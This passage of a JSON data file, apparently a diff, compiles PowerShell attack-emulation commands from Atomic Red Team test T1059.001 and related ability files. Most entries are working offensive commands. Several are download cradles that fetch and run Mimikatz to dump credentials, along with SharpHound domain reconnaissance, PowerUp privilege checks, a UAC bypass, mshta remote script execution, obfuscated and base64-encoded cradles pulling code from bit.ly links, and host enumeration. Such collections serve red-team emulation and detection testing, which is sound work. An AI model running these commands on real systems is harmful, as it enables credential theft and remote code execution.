Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop", + "powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==\n", + "$malcmdlets = \"Add-Persistence\", \"Find-AVSignature\", \"Get-GPPAutologon\", \"Get-GPPPassword\", \"Get-HttpStatus\", \"Get-Keystrokes\", \"Get-SecurityPackages\", \"Get-TimedScreenshot\", \"Get-VaultCredential\", \"Get-VolumeShadowCopy\", \"Install-SSP\", \"Invoke-CredentialInjection\", \"Invoke-DllInjection\", \"Invoke-Mimikatz\", \"Invoke-NinjaCopy\", \"Invoke-Portscan\", \"Invoke-ReflectivePEInjection\", \"Invoke-ReverseDnsLookup\", \"Invoke-Shellcode\", \"Invoke-TokenManipulation\", \"Invoke-WmiCommand\", \"Mount-VolumeShadowCopy\", \"New-ElevatedPersistenceOption\", \"New-UserPersistenceOption\", \"New-VolumeShadowCopy\", \"Out-CompressedDll\", \"Out-EncodedCommand\", \"Out-EncryptedScript\", \"Out-Minidump\", \"PowerUp\", \"PowerView\", \"Remove-Comments\", \"Remove-VolumeShadowCopy\", \"Set-CriticalProcess\", \"Set-MasterBootRecord\"\n\nforeach ($cmdlets in $malcmdlets) {\n \"function $cmdlets { Write-Host Pretending to invoke $cmdlets }\"}\nforeach ($cmdlets in $malcmdlets) {\n $cmdlets}\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)\nInvoke-AllChecks\n", + "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;", + "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";", + "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n", + "Get-Process -Name \"powershell\" | Stop-Process\n", + "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n", + "$job = Start-Job -ScriptBlock {\n $username = '#{host.user.name}';\n $password = '#{host.user.password}';\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;\n};\nReceive-Job -Job $job -Wait;\n", + "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n", + "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==\n" + ], + "commands": [ + { + "command": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "write-host \"Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\\T1059.001\\src\" -ForegroundColor Cyan\nimport-module PathToAtomicsFolder\\T1059.001\\src\\SharpHound.ps1\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "write-host \"Remote download of SharpHound.ps1 into memory, followed by execution of the script\" -ForegroundColor Cyan\nIEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\n(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()\nSet-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\\Windows\\System32\\cmd.exe'\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "powershell.exe -exec bypass -noprofile \"$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -noprofile \"$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "C:\\Windows\\system32\\cmd.exe /c \"mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()\"\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "# Encoded payload in next command is the following \"Set-Content -path \"$env:SystemRoot/Temp/art-marker.txt\" -value \"Hello from the Atomic Red Team\"\"\nreg.exe add \"HKEY_CURRENT_USER\\Software\\Classes\\AtomicRedTeam\" /v ART /t REG_SZ /d \"U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"\niex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\AtomicRedTeam').ART)))\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "powershell.exe -version 2 -Command Write-Host $PSVersion\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Add-Content -Path $env:TEMP\\NTFS_ADS.txt -Value 'Write-Host \"Stream Data Executed\"' -Stream 'streamCommand'\n$streamcommand = Get-Content -Path $env:TEMP\\NTFS_ADS.txt -Stream 'streamcommand'\nInvoke-Expression $streamcommand\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "New-PSSession -ComputerName $env:COMPUTERNAME\nTest-Connection $env:COMPUTERNAME\nSet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use -Value \"T1086 PowerShell Session Creation and Use\"\nGet-Content -Path $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\nRemove-Item -Force $env:TEMP\\T1086_PowerShell_Session_Creation_and_Use\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation C -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EA -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation E -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType Hyphen -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation EncodedArguments -Execute -ErrorAction Stop", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "$malcmdlets = \"Add-Persistence\", \"Find-AVSignature\", \"Get-GPPAutologon\", \"Get-GPPPassword\", \"Get-HttpStatus\", \"Get-Keystrokes\", \"Get-SecurityPackages\", \"Get-TimedScreenshot\", \"Get-VaultCredential\", \"Get-VolumeShadowCopy\", \"Install-SSP\", \"Invoke-CredentialInjection\", \"Invoke-DllInjection\", \"Invoke-Mimikatz\", \"Invoke-NinjaCopy\", \"Invoke-Portscan\", \"Invoke-ReflectivePEInjection\", \"Invoke-ReverseDnsLookup\", \"Invoke-Shellcode\", \"Invoke-TokenManipulation\", \"Invoke-WmiCommand\", \"Mount-VolumeShadowCopy\", \"New-ElevatedPersistenceOption\", \"New-UserPersistenceOption\", \"New-VolumeShadowCopy\", \"Out-CompressedDll\", \"Out-EncodedCommand\", \"Out-EncryptedScript\", \"Out-Minidump\", \"PowerUp\", \"PowerView\", \"Remove-Comments\", \"Remove-VolumeShadowCopy\", \"Set-CriticalProcess\", \"Set-MasterBootRecord\"\n\nforeach ($cmdlets in $malcmdlets) {\n \"function $cmdlets { Write-Host Pretending to invoke $cmdlets }\"}\nforeach ($cmdlets in $malcmdlets) {\n $cmdlets}\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\niex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)\nInvoke-AllChecks\n", + "source": "atomics/T1059.001/T1059.001.yaml", + "name": "Atomic Red Team Test - Command and Scripting Interpreter: PowerShell" + }, + { + "command": "cmd.exe /c \"net user\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"whoami /priv\" >> C:\\Windows\\temp\\history.log;\ncmd.exe /c \"netstat -ano\" >> C:\\Windows\\temp\\history.log;", + "source": "data/abilities/collection/55678719-e76e-4df9-92aa-10655bbd1cf4.yml", + "name": "User enumeration" + }, + { + "command": "powershell.exe -c \"Get-WmiObject -class win32_operatingsystem | select -property * | export-csv msdebug.log\";", + "source": "data/abilities/collection/702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml", + "name": "System Information Gathering Script" + }, + { + "command": "Copy-Item C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Windows\\Temp\\debug.exe;\nC:\\Windows\\Temp\\debug.exe get-process >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localgroup >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe get-localuser >> C:\\Windows\\temp\\debug.log;\nC:\\Windows\\Temp\\debug.exe Get-ItemProperty Registry::HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion >> C:\\Windows\\temp\\debug.log;\n", + "source": "data/abilities/defense-evasion/e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml", + "name": "Copy powershell to non-standard location and perform triage commands" + }, + { + "command": "Get-Process -Name \"powershell\" | Stop-Process\n", + "source": "data/abilities/execution/134b49a3-3f93-41bd-85f4-563eadbb6055.yml", + "name": "Kill all PowerShell processes" + }, + { + "command": "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\\Emulate-Administrator-Tasks.ps1\"\n", + "source": "data/abilities/execution/315cedf1-4a3a-4015-b63f-149d64bacbbc.yml", + "name": "Emulate administrator tasks on a system in a separate process" + }, + { + "command": "$job = Start-Job -ScriptBlock {\n $username = '#{host.user.name}';\n $password = '#{host.user.password}';\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;\n Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;\n};\nReceive-Job -Job $job -Wait;\n", + "source": "data/abilities/execution/3796a00b-b11d-4731-b4ca-275a07d83299.yml", + "name": "Run an application as a different user" + }, + { + "command": "powershell.exe -c IEX (New-Object Net.Webclient).downloadstring(\"https://bit.ly/33H0QXi\") \n", + "source": "data/abilities/execution/bfff9006-d1fb-46ce-b173-92cb04e9a031.yml", + "name": "Download" + }, + { + "command": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==\n", + "source": "data/abilities/execution/ccdb8caf-c69e-424b-b930-551969450c57.yml", + "name": "Download" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1059.001", + "display_name": "Command and Scripting Interpreter: PowerShell", + "atomic_tests": [ + { + "name": "Mimikatz", + "auto_generated_guid": "f3132740-55bc-48c4-bcc0-758a459cd027", + "description": "Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mimurl": { + "description": "Mimikatz url", + "type": "Url", + "default": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1" + } + }, + "executor": { + "command": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds\"\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Run BloodHound from local disk", + "auto_generated_guid": "a21bb23e-e677-4ee7-af90-6931b57b6350", + "description": "Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.\n\nSuccessful execution will produce stdout message stating \"SharpHound Enumeration Completed\". Upon completion, final output will be a *BloodHound.zip file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "File path for SharpHound payload", + "type": "String", + "default": "PathToAtomicsFolder\\T1059.001\\src" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "SharpHound.ps1 must be located at #{file_path}\n", + "prereq_command": "if (Test-Path #{file_path}\\SharpHound.ps1) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\" -OutFile \"#{file_path}\\SharpHound.ps1\"\n" + } + ], + "executor": { + "command": "write-host \"Import and Execution of SharpHound.ps1 from #{file_path}\" -ForegroundColor Cyan\nimport-module #{file_path}\\SharpHound.ps1\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "cleanup_command": "Remove-Item $env:Temp\\*BloodHound.zip -Force\n", + "name": "powershell" + } + }, + { + "name": "Run Bloodhound from Memory using Download Cradle", + "auto_generated_guid": "bf8c1441-4674-4dab-8e4e-39d93d08f9b7", + "description": "Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.\n\nSuccessful execution will produce stdout message stating \"SharpHound Enumeration Completed\". Upon completion, final output will be a *BloodHound.zip file.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "write-host \"Remote download of SharpHound.ps1 into memory, followed by execution of the script\" -ForegroundColor Cyan\nIEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');\nInvoke-BloodHound -OutputDirectory $env:Temp\nStart-Sleep 5\n", + "cleanup_command": "Remove-Item $env:Temp\\*BloodHound.zip -Force\n", + "name": "powershell" + } + }, + { + "name": "Obfuscation Tests", + "auto_generated_guid": "4297c41a-8168-4138-972d-01f3ee92c804", + "description": "Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: \"SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION\"\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\n(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()\nSet-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))\n", + "name": "powershell" + } + }, + { + "name": "Mimikatz - Cradlecraft PsSendKeys", + "auto_generated_guid": "af1800cf-9f9d-4fd1-a709-14b1e6de020d", + "description": "Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable 